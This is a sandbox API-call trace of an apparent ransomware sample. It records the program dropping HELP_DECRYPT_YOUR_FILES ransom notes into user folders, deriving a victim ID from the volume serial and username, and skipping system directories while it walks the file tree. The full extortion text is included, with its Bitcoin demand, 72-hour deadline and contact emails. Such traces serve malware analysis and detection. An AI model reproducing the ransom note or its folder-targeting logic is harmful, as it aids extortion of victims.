	[0180.196] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0180.196] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0180.199] CloseHandle (hObject=0x380) returned 1
	[0180.199] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.199] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.200] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.200] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0180.201] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.201] CreateFileW (lpFileName="C:\\Users\\Default\\PrintHood\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\printhood\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.201] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0180.201] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.202] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0180.202] CloseHandle (hObject=0x380) returned 1
	[0180.202] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\PrintHood\\*.*" (normalized: "c:\\users\\default\\printhood\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84a30fc8, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84a30fc8, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84eaa5de, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0xffffffff
	[0180.202] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0180.202] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1
	[0180.202] lstrcmpW (lpString1="Recent", lpString2="..") returned 1
	[0180.202] lstrcmpW (lpString1="Recent", lpString2=".") returned 1
	[0180.203] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default"
	[0180.203] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0180.203] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Recent" | out: lpString1="C:\\Users\\Default\\Recent") returned="C:\\Users\\Default\\Recent"
	[0180.203] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Recent" | out: lpString1="C:\\Users\\Default\\Recent") returned="C:\\Users\\Default\\Recent"
	[0180.203] lstrcatW (in: lpString1="C:\\Users\\Default\\Recent", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Recent\\") returned="C:\\Users\\Default\\Recent\\"
	[0180.203] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Default\\Recent\\" | out: lpString1="C:\\Users\\Default\\Recent\\") returned="C:\\Users\\Default\\Recent\\"
	[0180.203] lstrcatW (in: lpString1="C:\\Users\\Default\\Recent\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Recent\\*.*") returned="C:\\Users\\Default\\Recent\\*.*"
	[0180.203] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Recent\\*.*" (normalized: "c:\\users\\default\\recent\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84a30fc8, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84a30fc8, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84eaa5de, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0xffffffff
	[0180.205] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0180.205] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Recent" | out: lpString1="C:\\Users\\Default\\Recent") returned="C:\\Users\\Default\\Recent"
	[0180.205] lstrcatW (in: lpString1="C:\\Users\\Default\\Recent", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Recent\\*.*") returned="C:\\Users\\Default\\Recent\\*.*"
	[0180.205] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.206] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.206] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Default\\Recent\\HELP_DECRYPT_YOUR_FILES.TXT") returned 51
	[0180.206] CreateFileW (lpFileName="C:\\Users\\Default\\Recent\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\recent\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.208] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0180.208] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0180.210] CloseHandle (hObject=0x380) returned 1
	[0180.211] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.211] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.211] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0180.217] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0180.217] CreateFileW (lpFileName="C:\\Users\\Default\\Recent\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\recent\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.218] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0180.218] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0180.218] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0180.219] CloseHandle (hObject=0x380) returned 1
	[0180.219] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.219] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.220] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0180.220] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Default\\Recent\\HELP_DECRYPT_YOUR_FILES.HTML") returned 52
	[0180.220] CreateFileW (lpFileName="C:\\Users\\Default\\Recent\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\recent\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.220] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0180.220] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0180.223] CloseHandle (hObject=0x380) returned 1
	[0180.223] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.224] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.224] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.224] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0180.225] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.225] CreateFileW (lpFileName="C:\\Users\\Default\\Recent\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\recent\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.226] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0180.226] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.226] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0180.226] CloseHandle (hObject=0x380) returned 1
	[0180.226] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Recent\\*.*" (normalized: "c:\\users\\default\\recent\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84a30fc8, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84a30fc8, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84eaa5de, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0xffffffff
	[0180.227] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0180.227] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1
	[0180.227] lstrcmpW (lpString1="Saved Games", lpString2="..") returned 1
	[0180.227] lstrcmpW (lpString1="Saved Games", lpString2=".") returned 1
	[0180.227] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default"
	[0180.227] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0180.227] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Saved Games" | out: lpString1="C:\\Users\\Default\\Saved Games") returned="C:\\Users\\Default\\Saved Games"
	[0180.227] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Saved Games" | out: lpString1="C:\\Users\\Default\\Saved Games") returned="C:\\Users\\Default\\Saved Games"
	[0180.227] lstrcatW (in: lpString1="C:\\Users\\Default\\Saved Games", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Saved Games\\") returned="C:\\Users\\Default\\Saved Games\\"
	[0180.228] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Default\\Saved Games\\" | out: lpString1="C:\\Users\\Default\\Saved Games\\") returned="C:\\Users\\Default\\Saved Games\\"
	[0180.228] lstrcatW (in: lpString1="C:\\Users\\Default\\Saved Games\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Saved Games\\*.*") returned="C:\\Users\\Default\\Saved Games\\*.*"
	[0180.228] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Saved Games\\*.*" (normalized: "c:\\users\\default\\saved games\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb97b0
	[0180.228] lstrlenW (lpString="C:\\Users\\Default\\Saved Games\\*.*") returned 32
	[0180.228] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.228] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\Saved Games\\*.*", cchLength=0x20 | out: lpsz="c:\\users\\default\\saved games\\*.*") returned 0x20
	[0180.228] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.229] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="windows") returned 0x0
	[0180.229] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.229] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="boot") returned 0x0
	[0180.229] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.229] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="system volume information") returned 0x0
	[0180.229] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.229] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0180.230] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.230] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="temp") returned 0x0
	[0180.230] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.230] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="program files") returned 0x0
	[0180.230] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.230] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="program files (x86)") returned 0x0
	[0180.230] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.230] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="appdata") returned 0x0
	[0180.231] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.231] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="application data") returned 0x0
	[0180.231] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.231] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="winnt") returned 0x0
	[0180.231] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.231] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="tmp") returned 0x0
	[0180.231] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.232] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="cache") returned 0x0
	[0180.232] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.232] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="temporary internet files") returned 0x0
	[0180.232] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.232] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="webcache") returned 0x0
	[0180.232] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.232] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="inetcache") returned 0x0
	[0180.232] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.233] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="nvidia") returned 0x0
	[0180.233] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.233] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="packages") returned 0x0
	[0180.233] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.233] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="cookies") returned 0x0
	[0180.233] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.233] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="programdata") returned 0x0
	[0180.233] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0180.234] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0180.234] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 1
	[0180.234] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 0
	[0180.234] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Saved Games" | out: lpString1="C:\\Users\\Default\\Saved Games") returned="C:\\Users\\Default\\Saved Games"
	[0180.234] lstrcatW (in: lpString1="C:\\Users\\Default\\Saved Games", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Saved Games\\*.*") returned="C:\\Users\\Default\\Saved Games\\*.*"
	[0180.234] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.235] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.236] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Default\\Saved Games\\HELP_DECRYPT_YOUR_FILES.TXT") returned 56
	[0180.236] CreateFileW (lpFileName="C:\\Users\\Default\\Saved Games\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\saved games\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.236] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
